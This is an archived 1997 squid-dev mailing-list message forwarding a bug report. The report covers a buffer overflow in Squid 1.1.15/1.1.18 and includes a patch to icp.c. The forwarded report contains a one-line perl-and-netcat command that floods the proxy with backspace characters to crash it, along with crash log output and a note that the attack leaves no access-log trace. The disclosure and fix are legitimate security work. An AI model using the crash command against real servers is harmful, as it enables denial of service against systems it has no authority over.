squid buffer overflow + fix (fwd) from miguel a.l. paraz on 1997-12-15 (squid-dev)

From: miguel a.l. paraz <map@dont-contact.us>
Date: Tue, 16 Dec 1997 00:26:23 +0800 (HKT)

--MimeMultipartBoundary
Content-Type: TEXT/PLAIN; charset=US-ASCII

is there going to be a Bugtraq or CERT advisory soon? :)

--
miguel a.l. paraz	iphil communications, makati city, ph	+63-2-750-2288
---------- Forwarded message ----------
Date: Mon, 15 Dec 1997 15:13:44 +0300
From: Alexander Saleemon <lee@ewsd.chtts.ru>
To: squid-users@nlanr.net
Subject: squid buffer overflow + fix
Resent-Date: Mon, 15 Dec 1997 04:19:47 -0800 (PST)
Resent-From: squid-users@nlanr.net
perl -e 'print "GET http://somehost.net/", ("\010" x 66000),"\n\n"'
          |netcat myhost 3128
Almost instant crash for squid-1.1.15 and .18 on Linux2.0.29 and FreeBSD2.2.5R
Lines from cache.log:
97/12/09 14:08:57| clientReadRequest: FD 23 Invalid Request
97/12/09 14:08:57| ERR_INVALID_REQUEST: GET http://____/^H^H^H^H^H^H^H^H^H^H^H
                                       ^^^ in fact, almost 66K "\010"s
97/12/09 14:08:57| WARNING: FD 23: A comm_write is already active.
FATAL: Received Segment Violation...dying.
97/12/09 14:08:57| storeWriteCleanLog: Starting...
97/12/09 14:08:57|      4096 lines written so far.
97/12/09 14:08:58|      8192 lines written so far.
97/12/09 14:08:58|     12288 lines written so far.
97/12/09 14:08:58|   Finished.  Wrote 13992 lines.
97/12/09 14:08:58|   Took 1 seconds (13992.0 lines/sec).
CPU Usage: user 8 sys 5
It looks like squid dies in _db_print while trying to vsprintf too long line
into BUFSIZ array. 
While LOCAL_ARRAY expands to "static char f[BUFSIZ]" and not to stack variable,
I wonder if it is possible to exploit this bug/feature and execute machine code
(even with non-root access). 
There is no corresponding line in access.log, so this kind of attack
leaves no traces of source address (please correct me if I'm wrong)
(default debug flags assumed)
Simple patch for .18 follows:
*** icp.c.orig	Fri Oct 31 18:41:14 1997
--- icp.c	Mon Dec 15 14:34:04 1997
***************
*** 1808,1813 ****
--- 1808,1816 ----
  	    0);
      } else {
  	/* parser returned -1 */
+ 	/* 15-12-97 chop wrong request to avoid buffer overflow */
+         if(strlen(icpState->inbuf) > 1024) icpState->inbuf[1023] = '\0'; 
+         /* now we're relatively safe to print diags */
  	debug(12, 1, "clientReadRequest: FD %d Invalid Request\n", fd);
  	wbuf = squid_error_request(icpState->inbuf,
  	    ERR_INVALID_REQ,
--MimeMultipartBoundary--

Received on Tue Jul 29 2003 - 13:15:44 MDT

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:11:31 MST